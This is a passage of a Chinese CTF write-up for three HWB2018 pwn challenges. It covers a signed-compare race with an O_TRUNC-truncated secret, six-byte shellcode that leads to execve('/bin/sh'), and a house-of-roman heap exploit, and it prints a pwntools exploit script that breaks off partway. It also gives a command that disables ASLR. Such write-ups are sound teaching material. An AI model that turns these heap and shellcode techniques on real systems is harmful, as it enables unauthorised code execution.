class="c1"></span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;The final presentation is as follows:%s</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">s</span><span class="p">);</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>其中 md5 运算的轮数是用户决定的</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Input how many rounds do you want to encrypt the secret:&#34;</span><span class="p">);</span> <span class="n">how_many</span> <span class="o">=</span> <span class="n">get_int</span><span class="p">();</span> <span class="k">if</span> <span class="p">(</span> <span class="n">how_many</span> <span class="o">&gt;</span> <span class="mi">10</span> <span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;What? Why do you need to encrypt so many times?&#34;</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">how_many</span> <span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;At least encrypt one time&#34;</span><span class="p">,</span> <span class="n">s_secret</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> <span class="n">HIDWORD</span><span class="p">(</span><span class="n">v2</span><span class="p">)</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">&#34;/tmp/secret&#34;</span><span class="p">,</span> <span class="mo">01001</span><span class="p">);</span> <span class="n">LODWORD</span><span class="p">(</span><span class="n">v2</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="k">while</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="n">v2</span> <span class="o">&lt;</span> <span class="n">how_many</span> <span class="p">)</span> <span class="c1">// negative </span><span class="c1"></span> <span class="p">{</span> <span class="n">MD5</span><span class="p">((</span><span class="kr">__int64</span><span class="p">)</span><span class="n">s_secret</span><span class="p">,</span> <span class="mi">16LL</span><span class="p">,</span> <span class="p">(</span><span class="kr">__int64</span><span class="p">)</span><span class="n">s_secret</span><span class="p">);</span> <span class="n">LODWORD</span><span class="p">(</span><span class="n">v2</span><span class="p">)</span> <span class="o">=</span> <span class="n">v2</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>只判断了大于 10 和不为 0 的情况，但我们可以输入负数，当输入负数时，在 <code>signed</code> 和 <code>unsigned</code> 比较时 -1 会转化为一个很大的数，while 循环就会陷入一段很长时间的运算。</p> <p>这时如果再开一个 io 连接远程进入到这个流程中，到 MD5 之前</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback"> HIDWORD(v2) = open(&#34;/tmp/secret&#34;, 01001); LODWORD(v2) = 0; while ( (unsigned int)v2 &lt; how_many ) // negative { MD5((__int64)s_secret, 16LL, (__int64)s_secret); LODWORD(v2) = v2 + 1; } </code></pre></td></tr></table> </div> </div><p>这里 <code>open</code> 是以 <code>O_WRONLY | O_TRUNC</code> 的 flags 打开的，其中 <a href="https://code.woboq.org/userspace/glibc/sysdeps/unix/sysv/linux/bits/fcntl-linux.h.html#_M/O_TRUNC">O_TRUNC</a> 的含义是 <strong>当文件存在且被另一个程序以可写的模式打开时，把文件的长度截短为 0</strong>，因此此时第二个 io 将得到一个空的 <code>/tmp/secret</code>，因此只要我们输入 <code>MD5('\0' * 16)</code> 即可通过后边的 memcpy 验证，进入漏洞函数。</p> <p>进入漏洞函数后，方法就很多了，通过 stack-pivot 进行 orw 或者 leak libc 进而 get shell 都可以，我选择的是使用 <code>open, read, puts</code> 的方法。运气比较好，rdx 满足条件。</p> <h2 id="six">six</h2> <p><a href="https://github.com/bash-c/pwn_repo/tree/master/HWB2018_six">binary &amp; exploit here</a></p> <blockquote> <p>总觉得这道题目以前在哪里见过，忘了是哪次比赛的了。</p> </blockquote> <p>首先程序有两次 mmap，经过分析，两处空间分别用于保存 shellcode 和模拟栈，shellcode 权限是 rwx 。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="nf">mmap_rwx</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">fd</span><span class="p">;</span> <span class="c1">// ST04_4 </span><span class="c1"></span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">12</span><span class="p">];</span> <span class="c1">// [rsp+8h] [rbp-18h] </span><span class="c1"></span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-8h] </span><span class="c1"></span> <span class="n">v2</span> <span class="o">=</span> <span class="n">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> <span class="n">setvbuf</span><span class="p">(</span><span class="n">stdin</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span> <span class="n">setvbuf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span> <span class="n">setvbuf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">&#34;/dev/urandom&#34;</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">6uLL</span><span class="p">);</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mi">8</span><span class="p">],</span> <span class="mi">6uLL</span><span class="p">);</span> <span class="n">dest</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="mi">8</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFFFFFFF000LL</span><span class="p">),</span> <span class="mh">0x1000uLL</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span> <span class="n">stack</span> <span class="o">=</span> <span class="p">(</span><span class="kr">__int64</span><span class="p">)</span><span class="n">mmap</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">buf</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFFFFFFF000LL</span><span class="p">),</span> <span class="mh">0x1000uLL</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1280</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>程序读取 6 个字节添加到一段 shellcode 之后，6 个字节要满足</p> <ol> <li>3 个奇数 opcode，3个偶数 opcode</li> <li>各不相同</li> </ol> <p>程序给的 shellcode 为</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nl">.data:</span><span class="err">0000000000202020</span> <span class="c">; char sc[1] </span><span class="c"></span><span class="nl">.data:</span><span class="err">0000000000202020</span> <span class="nl">sc:</span> <span class="c">; DATA XREF: main+71↑o </span><span class="c"></span><span class="nl">.data:</span><span class="err">0000000000202020</span> <span class="c">; main+87↑o ... </span><span class="c"></span><span class="nl">.data:</span><span class="err">0000000000202020</span> <span class="nf">mov</span> <span class="no">rsp</span><span class="p">,</span> <span class="no">rdi</span> <span class="nl">.data:</span><span class="err">0000000000202023</span> <span class="nf">xor</span> <span class="no">rbp</span><span class="p">,</span> <span class="no">rbp</span> <span class="nl">.data:</span><span class="err">0000000000202026</span> <span class="nf">xor</span> <span class="no">rax</span><span class="p">,</span> <span class="no">rax</span> <span class="nl">.data:</span><span class="err">0000000000202029</span> <span class="nf">xor</span> <span class="no">rbx</span><span class="p">,</span> <span class="no">rbx</span> <span class="nl">.data:</span><span class="err">000000000020202</span><span class="nf">C</span> <span class="no">xor</span> <span class="no">rcx</span><span class="p">,</span> <span class="no">rcx</span> <span class="nl">.data:</span><span class="err">000000000020202</span><span class="nf">F</span> <span class="no">xor</span> <span class="no">rdx</span><span class="p">,</span> <span class="no">rdx</span> <span class="nl">.data:</span><span class="err">0000000000202032</span> <span class="nf">xor</span> <span class="no">rdi</span><span class="p">,</span> <span class="no">rdi</span> <span class="nl">.data:</span><span class="err">0000000000202035</span> <span class="nf">xor</span> <span class="no">rsi</span><span class="p">,</span> <span class="no">rsi</span> <span class="nl">.data:</span><span class="err">0000000000202038</span> <span class="nf">xor</span> <span class="no">r8</span><span class="p">,</span> <span class="no">r8</span> <span class="nl">.data:</span><span class="err">000000000020203</span><span class="nf">B</span> <span class="no">xor</span> <span class="no">r9</span><span class="p">,</span> <span class="no">r9</span> <span class="nl">.data:</span><span class="err">000000000020203</span><span class="nf">E</span> <span class="no">xor</span> <span class="no">r10</span><span class="p">,</span> <span class="no">r10</span> <span class="nl">.data:</span><span class="err">0000000000202041</span> <span class="nf">xor</span> <span class="no">r11</span><span class="p">,</span> <span class="no">r11</span> <span class="nl">.data:</span><span class="err">0000000000202044</span> <span class="nf">xor</span> <span class="no">r12</span><span class="p">,</span> <span class="no">r12</span> <span class="nl">.data:</span><span class="err">0000000000202047</span> <span class="nf">xor</span> <span class="no">r13</span><span class="p">,</span> <span class="no">r13</span> <span class="nl">.data:</span><span class="err">000000000020204</span><span class="nf">A</span> <span class="no">xor</span> <span class="no">r14</span><span class="p">,</span> <span class="no">r14</span> <span class="nl">.data:</span><span class="err">000000000020204</span><span class="nf">D</span> <span class="no">xor</span> <span class="no">r15</span><span class="p">,</span> <span class="no">r15</span> </code></pre></td></tr></table> </div> </div><p>清空了除 <code>rsp</code> 和 <code>rip</code> 之外的所有通用寄存器，并且可以看出 rsp 被设置为了我们之前 mmap 的空间用来模拟栈</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nl">.text:</span><span class="err">0000000000000</span><span class="nf">C87</span> <span class="no">mov</span> <span class="no">rdx</span><span class="p">,</span> <span class="no">cs</span><span class="p">:</span><span class="no">stack</span> <span class="nl">.text:</span><span class="err">0000000000000</span><span class="nf">C8E</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_28</span><span class="p">]</span> <span class="nl">.text:</span><span class="err">0000000000000</span><span class="nf">C92</span> <span class="no">mov</span> <span class="no">rdi</span><span class="p">,</span> <span class="no">rdx</span> <span class="nl">.text:</span><span class="err">0000000000000</span><span class="nf">C95</span> <span class="no">call</span> <span class="no">rax</span> </code></pre></td></tr></table> </div> </div><p>这样就可以通过 0 号系统调用，即 <code>sys_read</code> 来读取一部分内容了，很自然的想法是读到栈顶（</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"> <span class="nf">read</span> <span class="err">=</span> <span class="no">asm</span><span class="p">(</span><span class="err">&#39;&#39;&#39;</span> <span class="nf">push</span> <span class="no">rsp</span> <span class="nf">pop</span> <span class="no">rsi</span> <span class="nf">mov</span> <span class="no">edx</span><span class="p">,</span> <span class="no">esi</span> <span class="nf">syscall</span> <span class="err">&#39;&#39;&#39;)</span> <span class="nf">assert</span> <span class="no">len</span><span class="p">(</span><span class="no">read</span><span class="p">)</span> <span class="err">&lt;</span> <span class="mi">7</span> <span class="nf">io.sendafter</span><span class="p">(</span><span class="err">&#34;</span><span class="no">shellcode</span><span class="p">:</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">read</span><span class="p">)</span> </code></pre></td></tr></table> </div> </div><p>这段 shellcode 是符合要求的。</p> <p>当两次 mmap 的距离比较近时，就可以通过第二次 read 来覆盖 shellcode，进而控制 rip。能控制 rip 的话，直接控制 rip 到我们写的 <code>execve(&quot;/bin/sh&quot;, 0, 0)</code> 即可。成功率不是 100% 但也相当可观了。</p> <h2 id="calendar">calendar</h2> <p>off-by-one 和 uaf 的漏洞很容易发现，关键就在没有 leak，主办方也提示了使用 <code>house of roman</code> 这种方法。</p> <p>和原始的 <a href="https://gist.github.com/romanking98/9aab2804832c0fb46615f025e8ffb0bc">house of roman</a> 不同的是，这里不能直接 malloc 出在 unsorted bin 范围内的 chunk，但因为有 off-by-one，这个不是问题，通过 off-by-one 伪造 size 即可。</p> <p>另外这道题目当时没给 libc，但可以使用其他题目的 libc，姿势来自 muhe 师傅分享过的一个 <a href="https://github.com/bash-c/slides/blob/master/pwn_others/pwn_by_muhe.pptx">ppt</a> <img src="http://ww1.sinaimg.cn/large/006AWYXBly1fwh3uwvdlmj30qp061ab5.jpg" alt=""></p> <p>另外调试的时候可以关闭本地的 aslr。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash"><span class="c1"># echo 0 &gt; /proc/sys/kernel/randomize_va_space</span> </code></pre></td></tr></table> </div> </div><p>最后贴一下我的 exp，写了注释</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="nn">time</span> <span class="kn">import</span> <span class="n">sleep</span> <span class="kn">import</span> <span class="nn">os</span> <span class="kn">import</span> <span class="nn">sys</span> <span class="n">elfPath</span> <span class="o">=</span> <span class="s2">&#34;./task_calendar&#34;</span> <span class="n">libcPath</span> <span class="o">=</span> <span class="s2">&#34;./libc.so.6&#34;</span> <span class="n">remoteAddr</span> <span class="o">=</span> <span class="s2">&#34;117.78.26.133&#34;</span> <span class="n">remotePort</span> <span class="o">=</span> <span class="mi">31666</span> <span class="n">context</span><span class="o">.</span><span class="n">binary</span> <span class="o">=</span> <span class="n">elfPath</span> <span class="n">elf</span> <span class="o">=</span> <span class="n">context</span><span class="o">.</span><span class="n">binary</span> <span class="c1"># if sys.argv[1] == &#34;l&#34;:</span> <span class="c1"># io = process(elfPath, timeout = 5)</span> <span class="c1"># libc = elf.libc</span> <span class="c1"># else:</span> <span class="c1"># if sys.argv[1] == &#34;d&#34;:</span> <span class="c1"># io = process(elfPath, env = {&#34;LD_PRELOAD&#34;: libcPath})</span> <span class="c1"># else:</span> <span class="c1"># io = remote(remoteAddr, remotePort, timeout = 5)</span> <span class="c1"># if libcPath:</span> <span class="c1"># libc = ELF(libcPath)</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span> <span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s2">&#34;deepin-terminal&#34;</span><span class="p">,</span> <span class="s2">&#34;-x&#34;</span><span class="p">,</span> <span class="s2">&#34;sh&#34;</span><span class="p">,</span> <span class="s2">&#34;-c&#34;</span><span class="p">]</span> <span class="n">success</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">name</span><span class="p">,</span> <span class="n">value</span><span class="p">:</span> <span class="n">log</span><span class="o">.</span><span class="n">success</span><span class="p">(</span><span class="s2">&#34;{} -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">value</span><span class="p">))</span> <span class="k">def</span> <span class="nf">DEBUG</span><span class="p">():</span> <span class="n">base</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">popen</span><span class="p">(</span><span class="s2">&#34;pmap {}| awk &#39;{{print $1}}&#39;&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">pid</span><span class="p">))</span><span class="o">.</span><span class="n">readlines</span><span class="p">()[</span><span class="mi">1</span><span class="p">],</span> <span class="mi">16</span><span class="p">)</span> <span class="n">info</span><span class="p">(</span><span class="s2">&#34;edit -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="mh">0xEC8</span> <span class="o">+</span> <span class="n">base</span><span class="p">))</span> <span class="n">info</span><span class="p">(</span><span class="s2">&#34;free -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="mh">0xF0B</span> <span class="o">+</span> <span class="n">base</span><span class="p">))</span> <span class="n">info</span><span class="p">(</span><span class="s2">&#34;malloc -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="mh">0xDC6</span> <span class="o">+</span> <span class="n">base</span><span class="p">))</span> <span class="nb">raw_input</span><span class="p">(</span><span class="s2">&#34;DEBUG: &#34;</span><span class="p">)</span> <span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">idx</span><span class="p">,</span> <span class="n">size</span><span class="p">):</span> <span class="k">assert</span> <span class="mi">1</span> <span class="o">&lt;=</span> <span class="n">idx</span> <span class="o">&lt;=</span> <span class="mi">4</span> <span class="k">assert</span> <span class="mi">0</span> <span class="o">&lt;=</span> <span class="n">size</span> <span class="o">&lt;=</span> <span class="mh">0x68</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;choice&gt; &#34;</span><span class="p">,</span> <span class="s2">&#34;1&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;choice&gt; &#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;size&gt; &#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">size</span><span class="p">))</span> <span class="k">def</span> <span class="nf">edit</span><span class="p">(</span><span class="n">idx</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">info</span><span class="p">):</span> <span class="k">assert</span> <span class="mi">1</span> <span class="o">&lt;=</span> <span class="n">idx</span> <span class="o">&lt;=</span> <span class="mi">4</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;choice&gt; &#34;</span><span class="p">,</span> <span class="s2">&#34;2&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;choice&gt; &#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;size&gt; &#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">size</span><span class="p">))</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34;info&gt; &#34;</span><span class="p">,</span> <span class="n">info</span><span class="p">)</span> <span class="n">sleep</span><span class="p">(</span><span class="mf">0.01</span><span class="p">)</span> <span class="k">def</span> <span class="nf">delete</span><span class="p">(</span><span class="n">idx</span><span class="p">):</span> <span class="k">assert</span> <span class="mi">1</span> <span class="o">&lt;=</span> <span class="n">idx</span> <span class="o">&lt;=</span> <span class="mi">4</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;choice&gt; &#34;</span><span class="p">,</span> <span class="s2">&#34;3&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;choice&gt; &#34;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">))</span> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> <span class="k">while</span> <span class="bp">True</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="n">elfPath</span><span class="p">,</span> <span class="n">timeout</span> <span class="o">=</span> <span class="mi">5</span><span class="p">)</span> <span class="n">libc</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">libc</span> <span class="c1"># io = remote(remoteAddr, remotePort, timeout = 5)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;name&gt; &#34;</span><span class="p">,</span> <span class="s2">&#34;m4x&#34;</span><span class="p">)</span> <span class="n">add</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">)</span> <span class="n">add</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">)</span> <span class="n">add</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">)</span> <span class="c1"># forge unsorted bin</span> <span class="n">edit</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mh">0x60</span><span class="p">,</span> <span class="n">flat</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="mh">0x51</span><span class="p">)</span> <span class="o">+</span> <span class="s1">&#39;</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)</span> <span class="n">edit</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">,</span> <span class="s1">&#39;0&#39;</span> <span class="o">*</span> <span class="mh">0x68</span> <span class="o">+</span> <span class="s1">&#39;</span><span class="se">\x91</span><span class="s1">&#39;</span><span class="p">)</span> <span class="n">delete</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="c1"># chunk2 -&gt; main_arena + 88</span> <span class="n">edit</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">,</span> <span class="s1">&#39;1&#39;</span> <span class="o">*</span> <span class="mh">0x68</span> <span class="o">+</span> <span class="s1">&#39;</span><span class="se">\x71</span><span class="s1">&#39;</span><span class="p">)</span> <span class="n">delete</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="c1"># chunk1</span> <span class="n">delete</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span> <span class="c1"># chunk3 -&gt; chunk1</span> <span class="n">edit</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\x70\x70</span><span class="s1">&#39;</span><span class="p">)</span> <span class="c1"># chunk3 -&gt; chunk2 -&gt; main_arena + 88</span> <span class="n">edit</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\xfd\x1a</span><span class="s1">&#39;</span><span class="p">)</span> <span class="c1"># chunk3 -&gt; chunk2 -&gt; __malloc_hook - 0x13 -&gt; 0x7f</span> <span class="n">add</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">)</span> <span class="c1"># chunk2 -&gt; __malloc_hook - 0x13 -&gt; 0x7f</span> <span class="n">add</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">)</span> 